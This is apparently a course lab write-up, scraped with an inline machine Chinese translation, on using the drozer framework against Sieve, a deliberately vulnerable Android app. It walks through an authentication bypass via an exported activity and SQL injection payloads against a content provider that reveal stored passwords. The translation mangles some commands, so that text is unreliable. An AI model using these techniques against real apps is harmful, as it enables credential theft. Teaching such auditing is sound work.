M 501: Drozer (20 pts) M 501:Drozer(20分)

What You Need for This Project你需要什么这个项目

Purpose目的

To practice using drozer, "a comprehensive security audit and attack framework for Android", according to its product page .根据其产品页面 ,练习使用drozer,“针对Android的全面安全审计和攻击框架”。

Drozer allows you to audit IPC endpoints. Drozer允许您审核IPC端点。

Task 1: Installing Drozer任务1:安装Drozer

Installing Drozer on Kali在Kali上安装Drozer

On Kali, in a Terminal, execute these commands:在Kali上,在终端中执行以下命令: 
wget https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl wget https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl

pip install drozer-2.4.4-py2-none-any.whl pip install drozer-2.4.4-py2-none-any.whl
Drozer is "successfully installed", as shown below. Drozer“已成功安装”,如下所示。

Downloading the Drozer Agent下载Drozer代理

The Drozer agent is an Android app that works with the drozer software on Kali to test app security. Drozer代理是一款Android应用程序,可与Kali上的drozer软件配合使用来测试应用安全性。

On Kali, in a Terminal, execute these commands:在Kali上,在终端中执行以下命令: 

mkdir drozer mkdir drozer
cd drozer cd drozer
wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk
The file downloads, as shown below.文件下载,如下所示。

Connecting to your Android Device with ADB使用ADB连接到您的Android设备

On Kali, in a Terminal, execute these commands, replacing the IP address with the IP address of your Genymotion Android device:在Kali上,在终端中,执行这些命令,将IP地址替换为您的Genymotion Android设备的IP地址: 
adb connect 172.16.123.154 adb connect 172.16.123.154
adb devices -l adb devices -l
You should see your Genymotion device in the "List of devices attached", as shown below.您应该在“附加设备列表”中看到您的Genymotion设备,如下所示。

Installing the Agent on Android在Android上安装代理

On Kali, in a Terminal, execute this command:在Kali上,在终端中执行以下命令: 
adb install drozer-agent-2.3.4.apk adb install drozer-agent-2.3.4.apk
You see a "Success" message, as shown below.您会看到“成功”消息,如下所示。

Port Forwarding转发端口

Drozer needs to connect to port 31415 on the Android device, and the easiest way to do that is to forwrd the local port 31415 on Kali to the Android device with adb. Drozer需要连接到Android设备上的端口31415,最简单的方法是使用adb将Kali上的本地端口31415转发到Android设备。

On Kali, in a Terminal, execute this command:在Kali上,在终端中执行以下命令: 

adb forward tcp:31415 tcp:31415 adb forward tcp:31415 tcp:31415
The command completes without errors, as shown below.该命令完成且没有错误,如下所示。

Launching the Agent启动代理

On your Android device, from the home screen, swipe up from the bottom center up to see all apps.在Android设备上,从主屏幕向上轻扫,查看所有应用。

Launch drozer , as shown below.启动drozer ,如下所示。

In the "drozer" screen, at the lower right, click OFF .在“drozer”屏幕的右下角,单击“ 关闭” Now the "Embedded Server" is "ON", as shown below.现在“嵌入式​​服务器”处于“开启”状态,如下所示。

Task 2: Exploring Drozer任务2:探索Drozer

Opening the drozer Console打开drozer控制台

On Kali, in a Terminal, execute these commands:在Kali上,在终端中执行以下命令: 
drozer console connect drozer控制台连接
help救命
Drozer starts, as shown below. Drozer开始,如下所示。

On Kali, at the dz> prompt, execute these commands:在Kali上,在dz>提示符下,执行以下命令: 

help shell帮助shell
! whoami我是谁
As you can see, Drozer allows you to run shellcode on your device, with the permissions of the Drozer agent, which is not root, but a numbered user account.如您所见,Drozer允许您在设备上运行shellcode,具有Drozer代理的权限,该代理不是root用户,而是编号的用户帐户。 On my device, the account was u0_s102 , as shown below.在我的设备上,帐户是u0_s102 ,如下所示。

On Kali, at the dz> prompt, execute this command:在Kali上,在dz>提示符下,执行以下命令: 

list名单
A long list of drozer modules appears, as shown below.出现一长串的drozer模块,如下所示。 Drozer is a huge pentesting framework, like Metasploit. Drozer是一个庞大的测试框架,就像Metasploit一样。 As you can see, Drozer allows you to run shellcode on your device, with the permissions of the Drozer agent, which is not root, but a numbered user account.如您所见,Drozer允许您在设备上运行shellcode,具有Drozer代理的权限,该代理不是root用户,而是编号的用户帐户。 On my device, the account was u0_s102 , as shown below.在我的设备上,帐户是u0_s102 ,如下所示。

On Kali, at the dz> prompt, execute this command:在Kali上,在dz>提示符下,执行以下命令: 

exit出口

Task 3: Installing Sieve任务3:安装Sieve

Installing Sieve安装Sieve

We'll use an intentionally vulnerable app to practice using drozer.我们将使用一个故意易受攻击的应用来练习使用drozer。

On Kali, in the Terminal, execute these commands.在Kali上,在终端中执行这些命令。 

cd drozer cd drozer
wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk
adb install sieve.apk adb install sieve.apk
The install fails, saying "NO_MATCHING_ABIS, as shown below.安装失败,说“NO_MATCHING_ABIS,如下所示。

The problem is that Sieve is an ARM app, but Genymotion is an x86 emulator.问题是Sieve是一个ARM应用程序,但Genymotion是一个x86模拟器。

Troubleshooting故障排除

If that download link fails, use this alternate command:如果该下载链接失败,请使用此备用命令: 
wget https://samsclass.info/128/proj/sieve.apk wget https://samsclass.info/128/proj/sieve.apk

Installing ARM Translation Libraries安装ARM转换库

If you are working on an off-campus network, such as a coffeehouse or "Danger Zone" in S214, on your host system, open a Web browser and go to如果您正在校园网络上工作,例如S214中的咖啡馆或“危险区域”,请在主机系统上打开Web浏览器并转到

https://mega.nz/usg=ALkJrhgzajMZiTGuDUTxVBaGBlodOhsZbQ#F!JhcFwKpC!yfhfeUzvIZoSdBgfdZ9Ygg https://mega.nz/usg=ALkJrhgzajMZiTGuDUTxVBaGBlodOhsZbQ#F!JhcFwKpC!yfhfeUzvIZoSdBgfdZ9Ygg

Download ARM_Translation_Oreo.zip .下载ARM_Translation_Oreo.zip

Troubleshooting故障排除

If that download link fails, use this alternate download link:如果该下载链接失败,请使用此备用下载链接:

https://samsclass.info/128/proj/ARM_Translation_Oreo.zip https://samsclass.info/128/proj/ARM_Translation_Oreo.zip

Drag the ARM_Translation_Oreo.zip file onto your Android device and drop it there.ARM_Translation_Oreo.zip文件拖到Android设备上并将其放在那里。

A warning message pops up, as shown below.弹出警告消息,如下所示。 Click OK .单击确定

A message says the file was flashed successfully, as shown below.一条消息说文件已成功闪烁,如下所示。 Click OK .单击确定

Turn off your Android device and restart it.关闭Android设备并重新启动它。

Connecting to your Android Device with ADB使用ADB连接到您的Android设备

Adb lost its connection to the Genymotion device when it restarted, so you must connect it again.重新启动时,Adb失去了与Genymotion设备的连接,因此您必须再次连接它。

On Kali, in a Terminal, execute these commands, replacing the IP address with the IP address of your Genymotion Android device:在Kali上,在终端中,执行这些命令,将IP地址替换为您的Genymotion Android设备的IP地址: 

adb connect 172.16.123.154 adb connect 172.16.123.154
adb devices -l adb devices -l
You should see your Genymotion device in the "List of devices attached", as shown below.您应该在“附加设备列表”中看到您的Genymotion设备,如下所示。

Installing Sieve Again再次安装Sieve

On Kali, in the Terminal, and execute this command:在Kali上,在终端中,执行以下命令: 
adb install sieve.apk adb install sieve.apk
You see a "Success" message, as shown below.您会看到“成功”消息,如下所示。

Putting Passwords into Sieve将密码放入Sieve中

On your Android device, from the home screen, swipe up from the bottom center up to see all apps.在Android设备上,从主屏幕向上轻扫,查看所有应用。

Launch Sieve , as shown below.启动Sieve ,如下所示。

A "Welcome!"一个“欢迎!” screen appears, as shown below.屏幕出现,如下图所示。

Enter a password of Password12345678 in both fields and click Submit .在两个字段中输入密码Password12345678 ,然后单击“ 提交”

On the "Enter PIN" page, enter a PIN of 4567 in both fields and click Submit , as shown below.在“输入PIN”页面的两个字段中输入4567的PIN,然后单击“ 提交” ,如下所示。

In the next page, enter a password of Password12345678 fields and click " Sign in ", as shown below.在下一页中,输入Password12345678字段的密码 ,然后单击“ 登录 ”,如下所示。

In the "Your Passwords" page, at the top right, click the + icon.在“您的密码”页面的右上角,单击+图标。

Enter some test data, as shown below, and click Save .输入一些测试数据,如下所示,然后单击“ 保存”

Don't put any real passwords into this app, of course, because they will be revealed later in the project.当然,不要将任何真正的密码放入此应用程序中,因为它们将在项目的后期显示。

Task 4: Finding Sieve's Attack Surface with Drozer任务4:使用Drozer查找Sieve的攻击面

Launching the Agent启动代理

On your Android device, from the home screen, swipe up from the bottom center up to see all apps.在Android设备上,从主屏幕向上轻扫,查看所有应用。

Launch drozer , as shown below.启动drozer ,如下所示。

The "Embedded Server" should be "ON", as shown below. “嵌入式服务器”应为“ON”,如下所示。

Retrieving Package Information检索包信息

On Kali, at the dz> prompt, execute these commands:在Kali上,在dz>提示符下,执行以下命令: 
adb forward tcp:31415 tcp:31415 adb forward tcp:31415 tcp:31415
drozer console connect drozer控制台连接
run app.package.list -f sieve运行app.package.list -f筛
Drozer finds the path to the sieve app, which is Drozer找到筛选应用程序的路径,即

com.mwr.example.sieve com.mwr.example.sieve

as shown below.如下所示。

To see basic package information, on Kali, at the dz> prompt, execute this command:要查看基本包信息,请在Kali上的dz>提示符下执行以下命令: 

run app.package.info -a com.mwr.example.sieve运行app.package.info -a com.mwr.example.sieve
This shows where the app stores data, what permissions it has, and more information, as shown below.这显示了应用程序存储数据的位置,它拥有的权限以及更多信息,如下所示。

Identifying the Attack Surface识别攻击面

To see what vulnerabilities are exposed through Android's built-in Inter-Process Communication (IPC) system, on Kali, at the dz> prompt, execute this command:要查看通过Android的内置进程间通信(IPC)系统暴露的漏洞,请在Kali上的dz>提示符下执行以下命令: 
run app.package.attacksurface com.mwr.example.sieve运行app.package.attacksurface com.mwr.example.sieve
Drozer finds several items "exported" as shown below. Drozer发现了几个“导出”的项目,如下所示。 These items accept input from other apps, and are possible avenues of exploitation.这些项目接受来自其他应用程序的输入,并且可能是利用途径。

Task 5: Auditing Sieve's Activities with Drozer任务5:使用Drozer审核Sieve的活动

Launching Activities开展活动

To see which activities Sieve exports, on Kali, at the dz> prompt, execute this command:要在Kali上查看Sieve导出的活动,请在dz>提示符下执行以下命令: 
run app.activity.info -a com.mwr.example.sieve运行app.activity.info -a com.mwr.example.sieve
Drozer finds several items "exported" as shown below. Drozer发现了几个“导出”的项目,如下所示。 These items accept input from other apps, and are possible avenues of exploitation.这些项目接受来自其他应用程序的输入,并且可能是利用途径。

The "MainLoginActivity" makes sense--the app needs to take input from the keyboard for that. “MainLoginActivity”很有意义 - 应用程序需要从键盘获取输入。

But what are "FileSelectActivity" and "PWList"?但是什么是“FileSelectActivity”和“PWList”? They are both exported, and can be run without any permissions, as indicated by the "Permission: null" message.它们都被导出,并且可以在没有任何权限的情况下运行,如“Permission:null”消息所示。

Look at your Android Device看看你的Android设备

On your Android device, click the Home button to see the Home screen, as shown below.在Android设备上,单击“主页”按钮以查看主屏幕,如下所示。

Position the Android device so that it remains visible while you execute the Dozer command below.定位Android设备,以便在执行下面的Dozer命令时它仍然可见。

Launching PWList启动PWList

To run the "PWList" activity, on Kali, at the dz> prompt, execute this command:要在Kali上运行“PWList”活动,请在dz>提示符下执行以下命令: 
run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList运行app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
The command runs without errors, as shown below.该命令运行没有错误,如下所示。

On your Android device, the "Your Passwords" page opens, as shown below.在您的Android设备上,将打开“您的密码”页面,如下所示。

This is an authentication bypass exploit--the Drozer agent did not need your password or PIN to open this screen.这是一种身份验证绕过漏洞--Drozer代理不需要您的密码或PIN来打开此屏幕。

But at this point, we only see usernames, not passwords.但此时,我们只看到用户名,而不是密码。

Task 6: Auditing Sieve's Content Providers with Drozer任务6:使用Drozer审核Sieve的内容提供商

Reading from Content Providers从内容提供商处阅读

The "Attack Surface" said Sieve used two content providers. “攻击面”称Sieve使用了两个内容提供商。 To get more information about them, on Kali, at the dz> prompt, execute this command:要获取有关它们的更多信息,请在Kali上的dz>提示符下执行以下命令: 
run app.provider.info -a com.mwr.example.sieve运行app.provider.info -a com.mwr.example.sieve
Drozer finds two exported content providers: DBContentProvider and FileBackupProvider , as shown below. Drozer找到两个导出的内容提供者: DBContentProviderFileBackupProvider ,如下所示。 They don't require any permissions to interact with them, except for the /Keys path in the DBContentProvider.除DBContentProvider中的/ Keys路径外,它们不需要任何与它们交互的权限。

Finding URIs查找URI

Content provider URIs always begin with content:// but the rest is not obvious.内容提供程序URI始终以content://开头,但其余部分并不明显。 Drozer can guess them, however.然而,Drozer可以猜测它们。

On Kali, at the dz> prompt, execute this command:在Kali上,在dz>提示符下,执行以下命令: 

run scanner.provider.finduris -a com.mwr.example.sieve运行scanner.provider.finduris -a com.mwr.example.sieve
Drozer tries several guesses, and finds three "Accessible content URIs", highlighted in the image below. Drozer尝试了几次猜测,并找到了三个“可访问的内容URI”,在下图中突出显示。

We know the /Keys provider requires permissions, but evidently not /Passwords .我们知道/ Keys提供商需要权限,但显然不是/密码 To run the /Passwords provider, on Kali, at the dz> prompt, execute this command:要在Kali上运行/ Passwords提供程序,请在dz>提示符下执行以下命令: 

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/运行app.provider.query内容://com.mwr.example.sieve.DBContentProvider/Passwords/
You see your username and encoded password, highlighted in the image below.您会看到您的用户名和编码密码,如下图所示。

The password was unprintable binary data, so Drozer encoded it with Base64.密码是不可打印的二进制数据,因此Drozer使用Base64对其进行编码。 We don't have the plaintext password yet.我们还没有明文密码。

Task 7: Exploiting Database-Backed Content Providers with SQL Injection任务7:使用SQL注入利用数据库支持的内容提供程序

Triggering a SQL Error触发SQL错误

As usual, adding an apostrophe to a request triggers an error message.像往常一样,向请求添加撇号会触发错误消息。 There are two fields we can inject into: projection and selection .我们可以注入两个字段: 投影选择

On Kali, at the dz> prompt, execute these commands:在Kali上,在dz>提示符下,执行以下命令: 

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"运行app.provider.query内容://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection“'”

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"运行app.provider.query内容://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection“'”
The reply shows" SQLITE_ERROR " messages, including the source code for the query, highlighted in the image below.回复显示“ SQLITE_ERROR ”消息,包括查询的源代码,在下图中突出显示。

Enumerating Table Names枚举表名

Execute this command to list the table names in the database:执行此命令以列出数据库中的表名: 
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"运行app.provider.query内容://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection“* FROM SQLITE_MASTER WHERE type ='table';  - ”
The reply reveals three table names, including Key , highlighted in the image below.回复显示三个表名,包括Key ,在下图中突出显示。

M 501: Recording Your Success (20 pts) M 501:记录你的成功(20分)

Find the text covered by a green box in the image above.找到上图中绿框所覆盖的文字。 That's the flag.那是旗帜。

Finding Cleartext Passwords查找明文密码

SQL injection allows us to query the contents of the otherwise protected Key table. SQL注入允许我们查询受保护的Key表的内容。

Execute this command:执行以下命令: 

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"运行app.provider.query内容://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection“* FROM Key;  - ”
The reply reveals your plaintext password, as shown below.回复显示您的明文密码,如下所示。

Sources来源

Drozer Drozer
drozer user guide drozer用户指南
Converted to a CTF 2-28-19转换为CTF 2-28-19